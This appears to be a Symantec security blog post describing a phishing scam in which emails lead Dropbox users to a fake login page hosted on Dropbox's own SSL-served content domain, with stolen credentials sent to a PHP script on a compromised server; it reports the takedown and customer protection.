In March 2014, we blogged about how Google Docs and Google Drive users were being targeted by a sophisticated phishing scam. In this scam, messages included links to a fake Google Docs login page hosted on Google itself.
We continue to see millions of phishing messages every day, and recently we saw a similar scam targeting Dropbox users. The scam uses an email (with the subject "important") claiming that the recipient has been sent a document that is too big to be sent by email, or cannot be sent by email for security reasons. Instead, the email claims, the document can be viewed by clicking on the link included in the message. However, the link opens a fake Dropbox login page, hosted on Dropbox itself.
Figure 1. Fake Dropbox login page
The fake login page is hosted on Dropbox's user content domain (like shared photos and other files are) and is served over SSL, making the attack more dangerous and convincing.
The page looks like the real Dropbox login page, but with one crucial difference. The scammers are interested in phishing for more than just Dropbox credentials; they have also included logos of popular Web-based email services, suggesting that users can log in using these credentials as well.
After clicking "Sign in," the user’s credentials are sent to a PHP script on a compromised Web server. Credentials are also submitted over SSL, which is critical for the attack's effectiveness. Without this, victims would see an unnerving security warning.
Figure 2. Security warning
Upon saving or emailing the user's credentials to the scammer, the PHP script simply redirects the user to the real Dropbox login page.
Although the page itself is served over SSL, and credentials are sent using the protocol, some resources on the page (such as images or style sheets) are not served over SSL. Using non-SSL resources on a page served over SSL shows warnings in recent versions of some browsers. The prominence of the warning varies from browser to browser; some browsers simply change the padlock symbol shown in the address bar, whereas others include a small banner at the top of the page. Users may not notice or understand these security warnings or the associated implications.
Symantec reported this phishing page to Dropbox and they immediately took the page down. Any Dropbox-hosted phishing pages can be reported to the firstname.lastname@example.org email address.
Symantec Email Security.cloud as well as Symantec Messaging Gateway and Symantec Messaging Gateway for Service Providers customers were protected from this threat.